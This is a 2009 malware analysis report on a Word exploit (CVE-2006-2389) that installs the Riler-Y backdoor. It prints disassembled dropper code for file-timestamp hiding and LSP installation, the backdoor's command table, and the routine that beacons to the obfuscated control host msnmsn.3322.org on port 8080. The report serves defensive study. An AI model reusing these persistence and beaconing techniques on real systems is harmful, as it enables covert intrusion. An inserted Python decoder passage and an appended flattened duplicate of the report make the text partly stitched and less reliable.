Torrid Networks Pvt Ltd




                           Malware Analysis Report

                                                        Submitted to

                                                        Confidential
                                                        Submitted by

                                           Torrid Networks Pvt Ltd
                                                    www.torridnetworks.com

                                                    Date: 5th January, 2009




By accepting this document, you agree that neither this document nor the information disclosed herein, nor any part thereof, shall be
reproduced or transferred to other documents, or used or disclosed to others for any commercial purpose except as specifically authorized in
writing by Torrid. The document has been shared by Torrid for educational purpose only and shall not be held liable for any damage that you
might cause by performing similar task on your machine.



                                                                                                                                           1
             Unauthorized copying for any commercial purpose without permission is highly prohibited.

B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
Torrid Networks Pvt Ltd




Table of Contents
The Email Attachment ............................................................................................................................ 3
   Behind the Curtains ............................................................................................................................. 3
The Exploit .............................................................................................................................................. 4
   Anatomy of an Attacker ....................................................................................................................... 5
   Observations ....................................................................................................................................... 6
       File Changes & Process Binding ........................................................................................................ 6
            Dynamic Analysis ........................................................................................................................ 6
            Dynamic Analysis ........................................................................................................................ 7
            Static Analysis ............................................................................................................................. 7
            Disassembled binary in Assembly Language: ............................................................................... 7
       Service Changes ............................................................................................................................. 10
            Dynamic Analysis ...................................................................................................................... 10
            Static Analysis ........................................................................................................................... 10
            Disassembled binary in Assembly Language: ............................................................................. 10
       Registry Changes ........................................................................................................................... 11
            Dynamic Analysis ...................................................................................................................... 11
The Backdoor ........................................................................................................................................ 12
            Static Analysis ........................................................................................................................... 12
            Disassembled DLL in C Language: .............................................................................................. 12
The Control Connection ........................................................................................................................ 13
   Active Attack ..................................................................................................................................... 13
   Disabled Attack (Our Scenario) .......................................................................................................... 13
            Dynamic Analysis ...................................................................................................................... 14
            Static Analysis ........................................................................................................................... 16
            Disassembled DLL in C Language:.............................................................................................. 16
            Decoding the String:.................................................................................................................. 18
Summary .............................................................................................................................................. 19
Conclusion ............................................................................................................................................ 19








The Email Attachment
The sole purpose of the Word attachment is to carry the exploit and to convince the recipient to open
it, so that the malicious code can execute.

Behind the Curtains
We submitted the Word attachment to VirusTotal and got the following result summary. The result shows
that the Word file is a multistream compound file and that it contains an exploit.

The result also shows that the controller is quite old. According to an earlier analysis report found
on the internet, the controller version at that time was Stealth 2.6; after completing our analysis we
found that this sample's controller version is Stealth 8.1, which appears to be the latest one.








The Exploit

The email message contains a Word attachment that exploits a client-side buffer overflow vulnerability
(CVE-2006-2389) in Microsoft Word in Office 2000 SP3, Office XP SP3, Office 2003 SP1 and SP2, and
Microsoft Works Suites through 2006. The vulnerability allows user-assisted attackers to execute
arbitrary code via a malformed object pointer, and was originally reported by ISC on 2006-05-19 as a
zero-day attack.








Anatomy of an Attacker








Observations
File Changes & Process Binding

    1. The Word file exploits the vulnerability and executes the payload, which creates an executable
       file “winsock.exe” in the Temp folder.

Dynamic Analysis


    2. The executable “winsock.exe” further unpacks two embedded components into the
       system32 folder:
               a) “feelcat.ini”: this file contains the path of winsock.exe, “C:\Documents and
                    Settings\anks\Local Settings\Temp\winsock.exe”
               b) “toonjoke.dll”: detected as Troj/Riler-Gen
    3. After the files are created, the backdoor binds toonjoke.dll into svchost as an LSP (Layered
       Service Provider).

Troj/Riler-Y installs the file toonjoke.dll as a Windows Sockets 2 transport provider and reorders the
WSC chain such that it gets called first.







Dynamic Analysis




Static Analysis

Disassembled binary in Assembly Language:
   1. The following subroutine creates and opens the file toonjoke.dll and writes the data at locations
       403014 and 406E14 into it.
       sub_401000       proc near              ; CODE XREF: sub_401533+4Fp
       Filename         = dword ptr 4
                        push    esi
                        push    offset Mode    ; Mode
                        push    [esp+8+Filename] ; Filename
                        call    fopen
                        mov     esi, eax
                        pop     ecx
                        test    esi, esi
                        pop     ecx
                        jnz     short loc_401019
                        pop     esi
                        retn


       loc_401019:                             ; CODE XREF: sub_401000+15j
                        push    esi            ; File
                        push    Count          ; Count
                        push    1              ; Size
                        push    offset dword_403014 ; Str
                        call    fwrite
                        push    0              ; Origin
                        push    0D0h           ; Offset
                        push    esi            ; File

                        call    fseek
                        push    esi            ; File
                        push    2              ; Count
                        push    1              ; Size
                        push    offset dword_406E14 ; Str
                        call    fwrite
                        push    esi            ; File
                        call    fclose
                        add     esp, 30h
                        push    1
                        pop     eax
                        pop     esi
                        retn
        sub_401000      endp


    2. The following subroutine creates and opens the file filecat.ini and writes the path to
       winsock.exe into it.
        sub_401983      proc near                ; CODE XREF: sub_401533+5Fp

        Filename        = byte ptr -104h

                        push    ebp
                        mov     ebp, esp
                        sub     esp, 104h
                        push    esi
                        push    offset Buffer
                        push    dword_5207A4    ; Format
                        lea     eax, [ebp+Filename]
                        push    eax             ; Dest
                        call    sprintf
                        lea     eax, [ebp+Filename]
                        push    offset aW       ; "w"
                        push    eax             ; Filename
                        call    fopen
                        mov     esi, eax
                        add     esp, 14h
                        test    esi, esi
                        jz      short loc_4019DD
                        push    esi             ; File
                        push    offset Filename         ; Str
                        call    fputs
                        push    esi             ; File
                        push    offset Str      ; "n"
                        call    fputs
                        push    esi             ; File
                        call    fclose
                        add     esp, 14h

        loc_4019DD:                              ; CODE XREF: sub_401983+39j
                        pop     esi
                        leave
                        retn
        sub_401983      endp







    3. At the following location the subroutine changes the timestamps of toonjoke.dll so that it
       cannot be found by sorting on the “Date Modified” column in Windows Explorer. It sets the date
       back to the year 2000 so that the file blends in and does not appear at the top of the
       Windows\System32 folder among recently modified files.

       loc_4010B8:                               ; CODE XREF: sub_401056+2Fj
                                                 ; sub_401056+3Cj ...
                        xor     edi, edi
                        push    edi            ; hTemplateFile
                        push    80h            ; dwFlagsAndAttributes
                        push    3              ; dwCreationDisposition
                        push    edi            ; lpSecurityAttributes
                        push    2              ; dwShareMode
                        push    40000000h      ; dwDesiredAccess
                        push    [ebp+lpFileName] ; lpFileName
                        call    CreateFileA
                        mov     esi, eax
                        lea     eax, [ebp+CreationTime]
                        push    eax            ; lpLastWriteTime
                        lea     eax, [ebp+CreationTime]
                        push    edi            ; lpLastAccessTime
                        push    eax            ; lpCreationTime
                        push    esi            ; hFile
                        call    SetFileTime
                        push    esi            ; hObject
                        call    CloseHandle
                        pop     edi
                        pop     esi
                        pop     ebx
                        leave
                        retn
       sub_401056       endp







Service Changes
A new service “Windows Socket 2.0 Non-IFS Service Provider Support Environment” is started.

Dynamic Analysis
The following snapshot shows that a new service, “Windows Socket 2.0 Non-IFS Service Provider Support
Environment”, has been started with the highest severity level, “1”.




Static Analysis

Disassembled binary in Assembly Language:
   1. The following subroutine calls WSCInstallProvider to install the DLL as an MSNT service provider
       loc_401674:                              ; CODE XREF: sub_4015B2+D6j
                        movsx   dx, Dest[ecx]
                        mov     [eax], dx
                        inc     ecx
                        inc     eax
                        inc     eax
                        cmp     ecx, 104h
                        jl      short loc_401674
                        lea     eax, [ebp+var_10]
                        push    eax
                        lea     eax, [ebp+var_4FC]
                        push    1
                        push    eax
                        lea     eax, [ebp+var_704]
                        push    eax
                        push    offset dword_406F28
                        call    WSCInstallProvider
                        cmp     eax, 0FFFFFFFFh
                        jz      loc_4018DC
                        call    sub_401976
                        call    sub_401903
                        xor     esi, esi

                        cmp     dword_5207AC, ebx
                        jle     short loc_401701




    2. The following subroutine calls WSCInstallProvider to install the DLL as an MSNT service chain
       loc_401786:                              ; CODE XREF: sub_4015B2+154j
                        lea     eax, [ebp+var_10]
                        push    eax
                        lea     eax, [ebp+var_B78]
                        push    esi
                        push    eax
                        lea     eax, [ebp+var_704]
                        push    eax
                        push    offset dword_406F38
                        call    WSCInstallProvider
                        cmp     eax, 0FFFFFFFFh
                        jnz     short loc_4017BC
                        push    [ebp+var_10]
                        push    offset aWscinstallprov ; "WSCInstallProvider for chain Error: %d"
                        call    printf
                        pop     ecx
                        pop     ecx
                        jmp     loc_4018DC


Registry Changes

The following changes in the registry were observed.

Dynamic Analysis








The Backdoor
After the successful exploitation a backdoor Trojan of Troj/Riler-Y family is installed.

Static Analysis

Disassembled DLL in C Language:
The following is the list of commands that can be received from the Trojan's control server after a
successful connection with the compromised client. Network traffic from client to server also
contains the string “VER: Stealth 8.1” along with the IP address, NetBIOS name, OS version, etc. of the
compromised host.
void __thiscall sub_10001970(char *this)
{
  char *EndPtr; // [sp+0h] [bp-4h]@1

  EndPtr = this;
  off_100059F0 = "VER: Stealth 8.1";
  lpName = "whX3656";
  off_100059F8 = "LOCK";
  off_100059FC = "SEND";
  Format = "%sMS_Woople.ini";
  off_10005A10 = "WAKE";
  off_10005A14 = "NAME";
  off_10005A18 = "MOON";
  off_10005A1C = "KEEP";
  off_10005A20 = "DISK";
  off_10005A24 = "FILE";
  off_10005A28 = "DONE";
  off_10005A2C = "DOWN";
  off_10005A30 = "LONG";
  off_10005A34 = "MAKE";
  off_10005A38 = "ATTR";
  off_10005A3C = "KILL";
  off_10005A40 = "LIKE";
  off_10005A44 = "SEEK";
  off_10005A48 = "READ";
  off_10005A4C = "DEAD";
  off_10005A50 = "DDLL";
  off_10005A54 = "AUTO";
  lpString2 = "DIR:";
  byte_10005A74 = "NAME: %s";
  off_10005A78 = "L_IP: %s";
  off_10005A7C = "MARK: ";
  off_10005A80 = "OS: NT";
  off_10005A84 = "OS: WN";
  off_10005A88 = "%ssourcejob.dat";
  off_10005A8C = "%suidmngr.ini";
  off_10005A90 = "%stupix.ini";
  off_10005AB0[0] = "ERR code = ";
  off_10005AB4 = "F zzz <more>";
  off_10005AB8 = "READY";
  off_10005ABC = "END:";
  off_10005AC0 = "DRIVE %c:";
  off_10005AC4 = "C:*.*";
  off_10005AC8 = "%s00";
  dword_1000580C = 371;
  dword_10005810 = strtol("99C", &EndPtr, 10);   // base-10 parse stops at 'C', so this yields 99
  sub_10001930();






The Control Connection

Active Attack
In order for the Trojan to be effective, the compromised client needs to make a successful connection
with the control server, which is a two-step process:

    1. A DNS lookup to acquire the address of the control server;
    2. The actual connection.




Disabled Attack (Our Scenario)
In our scenario the compromised client could not resolve the address of the control server, so no
control connection was established between them and the compromised client was unable to receive
commands from the control server.







Dynamic Analysis
The following packet capture shows that the client was not able to find the address for msnmsn.3322.org.







The following packet capture shows that the compromised client attempts to establish a connection with
the control server (msnmsn.3322.org) on port number 8080.




To get on with the analysis, a local DNS server (not the legitimate authority for the domain) was set up
for the domain name 3322.org with an A record for msnmsn.3322.org pointing to 10.1.1.130, our own
honeypot server used for the analysis.







Static Analysis

Disassembled DLL in C Language:
The following code creates a socket to the obfuscated hostname FLGFLGejjiieHK@ (msnmsn.3322.org)
on port number ogog (8080).


signed int __cdecl sub_10002450()
{
  int v0; // edi@1
  int v1; // ecx@3
  char *v2; // edx@4
  int v3; // ecx@4
  LPSTR (__stdcall *v4)(LPSTR, LPCSTR); // ebx@4
  HANDLE v5; // ebp@6
  u_short v6; // si@6
  signed int v8; // esi@38
  int v9; // esi@50
  const CHAR *v10; // edi@51
  HANDLE v11; // esi@72
  SOCKET v12; // [sp-Ch] [bp-E8h]@15
  char *v13; // [sp-8h] [bp-E4h]@4
  const char *v14; // [sp-8h] [bp-E4h]@15
  const char *v15; // [sp-8h] [bp-E4h]@46
  int v16; // [sp-4h] [bp-E0h]@4
  int v17; // [sp-4h] [bp-E0h]@14
  char *v18; // [sp-4h] [bp-E0h]@46
  char Str; // [sp+10h] [bp-CCh]@4
  HANDLE hObject; // [sp+18h] [bp-C4h]@6
  CHAR String1; // [sp+1Ch] [bp-C0h]@4
  char v22; // [sp+5Ch] [bp-80h]@45

  sub_10002CB0();
  v0 = 0;
  if ( !dword_100064F4 )
    sub_10002BB0();
  v1 = dword_100064F0++;
  if ( v1 <= 5 )
  {
    v4 = lstrcpyA;
    lstrcpyA(&String1, "FLGFLGejjiieHK@           "); //Host Name msnmsn.3322.org
    v2 = &Str;
    v16 = (int)"ogog "; //Port 8080
    v13 = &Str;
  }
  else
  {
    v4 = lstrcpyA;
    dword_100064F0 = 0;
    lstrcpyA(&String1, "FLGFLGejjiieHK@           ");
    v16 = (int)"ogog ";
    v13 = &Str;
  }
  ((void (__fastcall *)(int, char *, char *, int))v4)(v3, v2, v13, v16);

  sub_10002E60(&String1);
  sub_10002E60(&Str);







The following code decodes the hostname and port number by subtracting 55 from the decimal value of
each ASCII character and adding 94 if the result is below 33; a space character terminates the string.

signed int __cdecl sub_10002E60(char *a1)   // buffer is decoded in place
{
  signed int result; // eax@1
  int v2; // edx@1
  unsigned int v3; // kr00_4@1

  result = 0;
  v2 = 0;
  v3 = strlen(a1);
  // The loop stops one byte short of the end, so the last byte is never decoded;
  // this is why the literals in the DLL carry trailing spaces.
  if ( (signed int)(v3 - 1) > 0 )
  {
    do
    {
      result = a1[v2];
      if ( result == 32 )
      {
        a1[v2] = 0;          // a space becomes the NUL terminator
      }
      else
      {
        result -= 55;        // shift the ASCII value down by 55
        if ( result < 33 )
          result += 94;      // wrap back into the printable range
        a1[v2] = result;
      }
      ++v2;
    }
    while ( v2 < (signed int)(v3 - 1) );
  }
  return result;
}







Decoding the String:
Applying the logic above, the following table decodes the obfuscated character string, which yields the
hostname “msnmsn.3322.org” and the port number “8080”.

 Character from      Decimal value         Result = decimal       If result < 33:       Decoded
 string                                    value - 55             result + 94           character
 F                   70                    15                     109                   m
 L                   76                    21                     115                   s
 G                   71                    16                     110                   n
 F                   70                    15                     109                   m
 L                   76                    21                     115                   s
 G                   71                    16                     110                   n
 e                   101                   46                     (not applied)         .
 j                   106                   51                     (not applied)         3
 j                   106                   51                     (not applied)         3
 i                   105                   50                     (not applied)         2
 i                   105                   50                     (not applied)         2
 e                   101                   46                     (not applied)         .
 H                   72                    17                     111                   o
 K                   75                    20                     114                   r
 @                   64                    9                      103                   g
 o                   111                   56                     (not applied)         8
 g                   103                   48                     (not applied)         0
 o                   111                   56                     (not applied)         8
 g                   103                   48                     (not applied)         0
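
To make the decoding rule of sub_10002E60 and the table above reusable for triaging other samples, here is an added Python re-implementation (not code from the report or from the DLL) that reproduces the routine byte for byte, including the fact that it never touches the last byte, and then scans a constructed byte blob for printable runs that decode to a hostname or port number. The sample blob, the hostname/port heuristics and the function names are my own assumptions, built only from the strings quoted in this report.

```python
import re
from typing import List, Optional, Tuple


def riler_decode(encoded: str) -> str:
    """Re-implementation of sub_10002E60 from the report, byte for byte.

    Every byte except the last is processed: a space (0x20) is turned into
    the NUL terminator; any other byte has 55 subtracted and, if the result
    is below 33, 94 added.  The loop stops at strlen-1, so the final byte is
    never touched, which is why the DLL pads its literals with spaces.
    """
    buf = bytearray(encoded.encode("ascii"))
    for i in range(len(buf) - 1):
        c = buf[i]
        if c == 0x20:
            buf[i] = 0
            continue
        c -= 55
        if c < 33:
            c += 94
        buf[i] = c
    # The DLL uses the buffer as a C string afterwards: stop at the first NUL.
    return buf.split(b"\x00", 1)[0].decode("ascii")


# Assumed heuristics (not from the report): what a decoded C2 string looks like.
HOSTNAME_RE = re.compile(
    r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)+$"
)
PORT_RE = re.compile(r"^\d{1,5}\s*$")   # trailing space: the last byte is untouched
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def classify(decoded: str) -> Optional[str]:
    """Label a decoded string as 'hostname', 'port' or None."""
    if HOSTNAME_RE.match(decoded):
        return "hostname"
    if PORT_RE.match(decoded) and 0 < int(decoded) <= 65535:
        return "port"
    return None


def find_encoded_strings(data: bytes) -> List[Tuple[str, str, str]]:
    """Scan raw bytes for printable runs whose decoding looks like C2 config.

    Returns (raw_literal, decoded, kind) triples in file order.
    """
    hits = []
    for m in PRINTABLE_RUN.finditer(data):
        raw = m.group().decode("ascii")
        decoded = riler_decode(raw)
        kind = classify(decoded)
        if kind is not None:
            hits.append((raw, decoded, kind))
    return hits


# Constructed stand-in for a DLL image: a few cleartext strings quoted in the
# report plus the two encoded literals, NUL-separated as they would be in .rdata.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00"
    + b"VER: Stealth 8.1\x00"
    + b"FLGFLGejjiieHK@           \x00"
    + b"\x00\x00ogog \x00"
    + b"%sMS_Woople.ini\x00"
)

if __name__ == "__main__":
    for raw, decoded, kind in find_encoded_strings(SAMPLE_BLOB):
        print(f"{kind:8s} {raw!r} -> {decoded!r}")
```

Running it on a real DLL means replacing SAMPLE_BLOB with the file's bytes; cleartext strings such as “VER: Stealth 8.1” decode to garbage and are filtered out by the heuristics.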








Summary
The control server for the backdoor was set up at msnmsn.3322.org (encoded as FLGFLGejjiieHK@ in the
DLL, as shown above), which originates in China. This attack is a fairly old one; it appears that federal
agencies have already taken down the host name msnmsn.3322.org, and there is no DNS record for this
sub-domain.

The backdoor is intelligently programmed: it resolves the domain name msnmsn.3322.org to an IP address
by performing the DNS lookup only after a built-in delay, which makes it difficult to catch while
analyzing network traffic. Also, there is no network activity from the backdoor until the DNS lookup has
been done.

To check the trojan's network activity, we set up a local DNS server with a master DNS zone for
3322.org and added an A record for msnmsn.3322.org pointing to our internal server running the
honeypot. We simulated the backdoor setup once again and saw the DNS query resolved by the backdoor
to the IP of the honeypot. We captured the traffic using a sniffer and found that, after getting a
positive response to the DNS query, the backdoor again waits for a few minutes just to confuse the
researcher, and only after that delay does it establish a TCP connection to the resolved IP address (in
our case, the honeypot's IP) on port number 8080 (encoded as ogog in the DLL, as shown above). After
establishing the connection on port 8080, it waits for input from the server before performing any
activity. Since the control server has been shut down, the backdoor does not receive commands from
the remote server and remains a dormant backdoor waiting for its master to come live again.

This particular attack was reported around 2005, and the backdoor payload is much older: it was first
reported in 2002 and named the Riler-Y Trojan, and there have been a few variants of this family since.
Most of the time these are part of a targeted attack and are not seen in the wild. The analysis
suggests that the controller version is Stealth 8.1, which appears to be a newer version of the
controller with more features such as remote VNC, command execution, DLL injection, etc.


Conclusion
Although the attack cannot be treated as successful due to the unavailability of the control server that
was supposed to be hosted at msnmsn.3322.org, it is highly recommended to remove the Trojan from the
compromised machine, either manually by following the analysis above or by using antivirus software,
to avoid losing control to the attacker in case the dead control server is brought live again. Also, use a
patched version of MS Office for the older versions (2000, 2003), or, as is always recommended, use the
latest product release (MS Office 2007 in this case).


Contact/Feedback:
                                info@torridnetworks.com




19 Conclusion ............................................................................................................................................ 19 2 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 3.
    Torrid Networks PvtLtd The Email Attachment The sole goal of the word attachment is to transport the exploit, and to convince the reader to click on it, so the malicious code can execute. Behind the Curtains We submitted the word attachment to Virus Total and got the following result summary. The result is showing that the word file is Multistream Compound file and contains an exploit with it. The result is also showing that the controller is quite old enough. According to the previous analysis report found on the internet, the control version name at that time is Stealth 2.6 but after the whole analysis we find that this control version name is Stealth 8.1 which seems to be the latest one. 3 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 4.
    Torrid Networks PvtLtd The Exploit The email message contains a word attachment which exploits client side vulnerability “Buffer overflow” ( CVE-2006-2389 ) in Microsoft Word in Office 2000 SP3, Office XP SP3, Office 2003 Sp1 and SP2, and Microsoft Works Suites through 2006, allows user-assisted attackers to execute arbitrary code via a malformed object pointer, as originally reported by ISC on 20060519 for a zero-day attack. 4 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 5.
    Torrid Networks PvtLtd Anatomy of an Attacker 5 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 6.
    Torrid Networks PvtLtd Observations File Changes & Process Binding 1. The word file exploits the vulnerability and executes the payload which creates an executable file “winsock.exe” in the Temp folder. Dynamic Analysis 2. The executable file “winsock.exe” further unpacks into two embedded components in the system32 folder: a) “feelcat.ini”: This file contains the path of winsock.exe “C:Documents and SettingsanksLocal SettingsTempwinsock.exe” b) “toonjoke.dll”: detected as Troj/Riler-Gen 3. After the files are created the backdoor binds the toonjoke.dll with svchost as a LSP(Layered Service Provider) Troj/Riler-Y will install the file toonjoke.dll as a Windows Sockets 2 transport provider and reorder the WSC Chain such that it gets called first. 6 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 7.
    Torrid Networks PvtLtd Dynamic Analysis Static Analysis Disassembled binary in Assembly Language: 1. The following Sub-Routine creates & opens File Name toonjoke.dll and writes data from 403014 and 406E14 location to toonjoke.dll sub_401000 proc near ; CODE XREF: sub_401533+4Fp Filename = dword ptr 4 push esi push offset Mode ; Mode push [esp+8+Filename] ; Filename call fopen mov esi, eax pop ecx test esi, esi pop ecx jnz short loc_401019 pop esi retn loc_401019: ; CODE XREF: sub_401000+15j push esi ; File push Count ; Count push 1 ; Size push offset dword_403014 ; Str call fwrite push 0 ; Origin push 0D0h ; Offset push esi ; File 7 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 8.
    Torrid Networks PvtLtd call fseek push esi ; File push 2 ; Count push 1 ; Size push offset dword_406E14 ; Str call fwrite push esi ; File call fclose add esp, 30h push 1 pop eax pop esi retn sub_401000 endp 2. The following Sub-Routine creates & opens File Name filecat.ini file with contents as path to the winsock.exe sub_401983 proc near ; CODE XREF: sub_401533+5Fp Filename = byte ptr -104h push ebp mov ebp, esp sub esp, 104h push esi push offset Buffer push dword_5207A4 ; Format lea eax, [ebp+Filename] push eax ; Dest call sprintf lea eax, [ebp+Filename] push offset aW ; "w" push eax ; Filename call fopen mov esi, eax add esp, 14h test esi, esi jz short loc_4019DD push esi ; File push offset Filename ; Str call fputs push esi ; File push offset Str ; "n" call fputs push esi ; File call fclose add esp, 14h loc_4019DD: ; CODE XREF: sub_401983+39j pop esi leave retn sub_401983 endp 8 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 9.
    Torrid Networks PvtLtd 3. At the following location Sub-Routine changes the timestamp to make toonjoke.dll non- searchable by clicking on “Modified Date” tab in windows Explorer. It basically sets the date for year 2000 so that the file gets mixed and doesn’t appear on the top of Windows/System32 folder as recent modified documents. loc_4010B8: ; CODE XREF: sub_401056+2Fj ; sub_401056+3Cj ... xor edi, edi push edi ; hTemplateFile push 80h ; dwFlagsAndAttributes push 3 ; dwCreationDisposition push edi ; lpSecurityAttributes push 2 ; dwShareMode push 40000000h ; dwDesiredAccess push [ebp+lpFileName] ; lpFileName call CreateFileA mov esi, eax lea eax, [ebp+CreationTime] push eax ; lpLastWriteTime lea eax, [ebp+CreationTime] push edi ; lpLastAccessTime push eax ; lpCreationTime push esi ; hFile call SetFileTime push esi ; hObject call CloseHandle pop edi pop esi pop ebx leave retn sub_401056 endp 9 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 10.
    Torrid Networks PvtLtd Service Changes A new service “Windows Socket 2.0 Non-IFS Service Provider Support Environment” is started. Dynamic Analysis The following snapshot shows that a new service “Windows Socket 2.0 Non-IFS Service Provider Support Environment” is started which is having a highest severity level “1”. Static Analysis Disassembled binary in Assembly Language: 1. The following Sub-Routine calls Install Provider as MSNT Service Provider loc_401674: ; CODE XREF: sub_4015B2+D6j movsx dx, Dest[ecx] mov [eax], dx inc ecx inc eax inc eax cmp ecx, 104h jl short loc_401674 lea eax, [ebp+var_10] push eax lea eax, [ebp+var_4FC] push 1 push eax lea eax, [ebp+var_704] push eax push offset dword_406F28 call WSCInstallProvider cmp eax, 0FFFFFFFFh jz loc_4018DC call sub_401976 call sub_401903 xor esi, esi 10 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 11.
    Torrid Networks PvtLtd cmp dword_5207AC, ebx jle short loc_401701 2. The following Sub-Routine calls Install Provider as MSNT Service Chain loc_401786: ; CODE XREF: sub_4015B2+154j lea eax, [ebp+var_10] push eax lea eax, [ebp+var_B78] push esi push eax lea eax, [ebp+var_704] push eax push offset dword_406F38 call WSCInstallProvider cmp eax, 0FFFFFFFFh jnz short loc_4017BC push [ebp+var_10] push offset aWscinstallprov ; "WSCInstallProvider for chain Error: %d" call printf pop ecx pop ecx jmp loc_4018DC Registry Changes The following changes in the registry were observed. Dynamic Analysis 11 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 12.
    Torrid Networks PvtLtd The Backdoor After the successful exploitation a backdoor Trojan of Troj/Riler-Y family is installed. Static Analysis Disassembled DLL in C Language: The following is the list of commands that can be received from the Control Server of the Trojan after the successful connection with the compromised client. Network traffic from client to server also contains the string “VER: Stealth 8.1” along with IP address, Netbios name, OS Version, etc. of the compromised host. void __thiscall sub_10001970(char *this) { char *EndPtr; // [sp+0h] [bp-4h]@1 EndPtr = this; off_100059F0 = "VER: Stealth 8.1"; lpName = "whX3656"; off_100059F8 = "LOCK"; off_100059FC = "SEND"; Format = "%sMS_Woople.ini"; off_10005A10 = "WAKE"; off_10005A14 = "NAME"; off_10005A18 = "MOON"; off_10005A1C = "KEEP"; off_10005A20 = "DISK"; off_10005A24 = "FILE"; off_10005A28 = "DONE"; off_10005A2C = "DOWN"; off_10005A30 = "LONG"; off_10005A34 = "MAKE"; off_10005A38 = "ATTR"; off_10005A3C = "KILL"; off_10005A40 = "LIKE"; off_10005A44 = "SEEK"; off_10005A48 = "READ"; off_10005A4C = "DEAD"; off_10005A50 = "DDLL"; off_10005A54 = "AUTO"; lpString2 = "DIR:"; byte_10005A74 = "NAME: %s"; off_10005A78 = "L_IP: %s"; off_10005A7C = "MARK: "; off_10005A80 = "OS: NT"; off_10005A84 = "OS: WN"; off_10005A88 = "%ssourcejob.dat"; off_10005A8C = "%suidmngr.ini"; off_10005A90 = "%stupix.ini"; off_10005AB0[0] = "ERR code = "; off_10005AB4 = "F zzz <more>"; off_10005AB8 = "READY"; off_10005ABC = "END:"; off_10005AC0 = "DRIVE %c:"; off_10005AC4 = "C:*.*"; off_10005AC8 = "%s00"; dword_1000580C = 371; dword_10005810 = strtol("99C", &EndPtr, 10); sub_10001930(); 12 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 13.
    Torrid Networks PvtLtd The Control Connection Active Attack In order for the Trojan to be effective it needs the Compromise Client to make a successful connection with the Control Server which is a two step process: 1. A DNS lookup to acquire the address of the control server; 2. The actual connection. Disabled Attack (Our Scenario) In our scenario the Compromised Client did not find the address of the Control Server, so a Control connection is not established between them and the Compromised Client not able to receive the commands from the Control Server. 13 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 14.
    Torrid Networks PvtLtd Dynamic Analysis The following packet capture shows that client was not able to find the address for msnmsn.3322.org. 14 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 15.
    Torrid Networks PvtLtd The following packet capture shows that the compromised client wants to establish a connection with the control server (msnmsn.3322.org) on port number 8080. To get going with the analysis, a local and unauthorized DNS server was setup for domain name 3322.org with A record for msnmsn.3322.org pointing to 10.1.1.130 which is our own honeypot server used for analysis. 15 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 16.
